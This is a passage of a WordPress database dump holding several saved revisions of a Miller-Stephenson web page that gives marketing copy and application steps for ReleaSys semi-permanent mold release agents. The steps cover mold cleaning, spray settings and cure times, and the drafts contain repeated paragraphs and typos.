underline; font-size: 115%;"><strong>Application</strong></span>\r\n\r\n<span style="font-size: 100%;">Surface-Preparation:</span>\r\n\r\nSemi-permanent mold release agents require specific preparaation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Typically prior to application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.\r\n\r\nApplication to Mold Surface:\r\n\r\n&nbsp;\r\n\r\nFollow manufacturer’s guidelines for removing whatever type o frelease or coatings that are currently on the mold.Older molds thathave significant buildup of releases, and molds that have beencoated with paste wax, should be cleaned with heavy duty\r\n<div data-canvas-width="103.916">cleaner/strippers such as AXEL’s CW-10NC, followed by a warmwater wash, and then cleaned again with a good general purpose solvent cleaner,such asIt is always a good practiceto both water and solvent clean molds; this will insure removal ofwater-soluble contaminates that a solvent cleaner alone may notremove. A clean mold should be streak free and masking tape shouldadhere well to the surface.</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div data-canvas-width="370.56179999999995">The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>\r\n<div data-canvas-width="370.56179999999995"></div>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson\'s ReleaSys semi-permanent release agents provide is  are reactive resin solutions designed to cross-link and cure on mold surfaces providing a durable and inert</div>\r\n<div data-canvas-width="320.06460000000004">release film. The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the</div>\r\n<div data-canvas-width="423.3332">particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,</div>\r\n<div data-canvas-width="151.65760000000006">or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>', 'Mold Release Application Guide - Solutions to Common Molding Issues', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-23 18:43:05', '2016-10-23 18:43:05', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2697, 3, '2016-10-23 18:56:41', '2016-10-23 18:56:41', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul>\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<span style="font-size: 140%;"><strong>Application Guide:\r\n</strong></span>\r\n\r\n<span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span>\r\n\r\nSemi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Typically prior to application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.\r\n\r\n<span style="text-decoration: underline;">Application to Mold Surface</span>\r\n\r\nMiller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure.\r\n\r\nFollow manufacturer’s guidelines for removing whatever type o frelease or coatings that are currently on the mold.Older molds that have significant buildup of releases, and molds that have been coated with paste wax, should be cleaned with heavy duty\r\n<div data-canvas-width="103.916">cleaner/strippers such as AXEL’s CW-10NC, followed by a warmwater wash, and then cleaned again with a good general purpose solvent cleaner,such asIt is always a good practiceto both water and solvent clean molds; this will insure removal ofwater-soluble contaminates that a solvent cleaner alone may notremove. A clean mold should be streak free and masking tape shouldadhere well to the surface.</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div data-canvas-width="370.56179999999995">The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>\r\n<div data-canvas-width="370.56179999999995"></div>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson\'s ReleaSys semi-permanent release agents provide is  are reactive resin solutions designed to cross-link and cure on mold surfaces providing a durable and inert</div>\r\n<div data-canvas-width="320.06460000000004">release film. The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the</div>\r\n<div data-canvas-width="423.3332">particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,</div>\r\n<div data-canvas-width="151.65760000000006">or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>', 'Mold Release Application Guide - Solutions to Common Molding Issues', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-23 18:56:41', '2016-10-23 18:56:41', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2698, 3, '2016-10-23 19:18:22', '2016-10-23 19:18:22', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul>\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<span style="font-size: 140%;"><strong>Application Guide:\r\n</strong></span>\r\n\r\n<span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span>\r\n\r\nSemi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Typically prior to application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.\r\n\r\n<span style="text-decoration: underline;">Application to Mold Surface</span>\r\n\r\nMiller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:\r\n<ol>\r\n 	<li> Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressures is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet.</li>\r\n</ol>\r\nFollow manufacturer’s guidelines for removing whatever type o frelease or coatings that are currently on the mold.Older molds that have significant buildup of releases, and molds that have been coated with paste wax, should be cleaned with heavy duty\r\n<div data-canvas-width="103.916">cleaner/strippers such as AXEL’s CW-10NC, followed by a warmwater wash, and then cleaned again with a good general purpose solvent cleaner,such asIt is always a good practiceto both water and solvent clean molds; this will insure removal ofwater-soluble contaminates that a solvent cleaner alone may notremove. A clean mold should be streak free and masking tape shouldadhere well to the surface.</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div data-canvas-width="370.56179999999995">The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>\r\n<div data-canvas-width="370.56179999999995"></div>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson\'s ReleaSys semi-permanent release agents provide is  are reactive resin solutions designed to cross-link and cure on mold surfaces providing a durable and inert</div>\r\n<div data-canvas-width="320.06460000000004">release film. The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the</div>\r\n<div data-canvas-width="423.3332">particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,</div>\r\n<div data-canvas-width="151.65760000000006">or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>', 'Mold Release Application Guide - Solutions to Common Molding Issues', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-23 19:18:22', '2016-10-23 19:18:22', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2699, 3, '2016-10-23 19:28:25', '2016-10-23 19:28:25', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul>\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<span style="font-size: 140%;"><strong>Application Guide:\r\n</strong></span>\r\n\r\n<span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span>\r\n\r\nSemi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Typically prior to application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.\r\n\r\n<span style="text-decoration: underline;">Application to Mold Surface</span>\r\n\r\nMiller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:\r\n<ol>\r\n 	<li> Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Spray 8-10 inches from the surface with approximately 50% overlap. When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film" and allowed to dry on the surface, failure to do so will dramtically effect performance.</li>\r\n 	<li></li>\r\n</ol>\r\nFollow manufacturer’s guidelines for removing whatever type o frelease or coatings that are currently on the mold.Older molds that have significant buildup of releases, and molds that have been coated with paste wax, should be cleaned with heavy duty\r\n<div data-canvas-width="103.916">cleaner/strippers such as AXEL’s CW-10NC, followed by a warmwater wash, and then cleaned again with a good general purpose solvent cleaner,such asIt is always a good practiceto both water and solvent clean molds; this will insure removal ofwater-soluble contaminates that a solvent cleaner alone may notremove. A clean mold should be streak free and masking tape shouldadhere well to the surface.</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div data-canvas-width="370.56179999999995">The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>\r\n<div data-canvas-width="370.56179999999995"></div>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson\'s ReleaSys semi-permanent release agents provide is  are reactive resin solutions designed to cross-link and cure on mold surfaces providing a durable and inert</div>\r\n<div data-canvas-width="320.06460000000004">release film. The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the</div>\r\n<div data-canvas-width="423.3332">particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,</div>\r\n<div data-canvas-width="151.65760000000006">or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>', 'Mold Release Application Guide - Solutions to Common Molding Issues', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-23 19:28:25', '2016-10-23 19:28:25', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2700, 3, '2016-10-23 20:48:56', '2016-10-23 20:48:56', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul>\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<span style="font-size: 140%;"><strong>Application Guide:\r\n</strong></span>\r\n\r\n<span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span>\r\n\r\nSemi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Typically prior to application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.\r\n\r\n<span style="text-decoration: underline;">Application to Mold Surface</span>\r\n\r\nMiller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:\r\n<ol>\r\n 	<li> Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Spray 8-10 inches from the surface with approximately 50% overlap. When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li>When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n</ol>\r\nFollow manufacturer’s guidelines for removing whatever type o frelease or coatings that are currently on the mold.Older molds that have significant buildup of releases, and molds that have been coated with paste wax, should be cleaned with heavy duty\r\n<div data-canvas-width="103.916">cleaner/strippers such as AXEL’s CW-10NC, followed by a warmwater wash, and then cleaned again with a good general purpose solvent cleaner,such asIt is always a good practiceto both water and solvent clean molds; this will insure removal ofwater-soluble contaminates that a solvent cleaner alone may notremove. A clean mold should be streak free and masking tape shouldadhere well to the surface.</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div data-canvas-width="370.56179999999995">The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>\r\n<div data-canvas-width="370.56179999999995"></div>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson\'s ReleaSys semi-permanent release agents provide is  are reactive resin solutions designed to cross-link and cure on mold surfaces providing a durable and inert</div>\r\n<div data-canvas-width="320.06460000000004">release film. The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the</div>\r\n<div data-canvas-width="423.3332">particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,</div>\r\n<div data-canvas-width="151.65760000000006">or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>', 'Mold Release Application Guide - Solutions to Common Molding Issues', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-23 20:48:56', '2016-10-23 20:48:56', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2701, 3, '2016-10-23 20:50:00', '2016-10-23 20:50:00', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul>\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<span style="font-size: 140%;"><strong>Application Guide:\r\n</strong></span>\r\n\r\n<span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span>\r\n\r\nSemi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.\r\n\r\n<span style="text-decoration: underline;">Application to Mold Surface</span>\r\n\r\nMiller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:\r\n<ol>\r\n 	<li> Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Spray 8-10 inches from the surface with approximately 50% overlap. When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li>When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n</ol>\r\nFollow manufacturer’s guidelines for removing whatever type o frelease or coatings that are currently on the mold.Older molds that have significant buildup of releases, and molds that have been coated with paste wax, should be cleaned with heavy duty\r\n<div data-canvas-width="103.916">cleaner/strippers such as AXEL’s CW-10NC, followed by a warmwater wash, and then cleaned again with a good general purpose solvent cleaner,such asIt is always a good practiceto both water and solvent clean molds; this will insure removal ofwater-soluble contaminates that a solvent cleaner alone may notremove. A clean mold should be streak free and masking tape shouldadhere well to the surface.</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div data-canvas-width="370.56179999999995">The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>\r\n<div data-canvas-width="370.56179999999995"></div>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson\'s ReleaSys semi-permanent release agents provide is  are reactive resin solutions designed to cross-link and cure on mold surfaces providing a durable and inert</div>\r\n<div data-canvas-width="320.06460000000004">release film. The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the</div>\r\n<div data-canvas-width="423.3332">particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,</div>\r\n<div data-canvas-width="151.65760000000006">or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>', 'Mold Release Application Guide - Solutions to Common Molding Issues', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-23 20:50:00', '2016-10-23 20:50:00', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
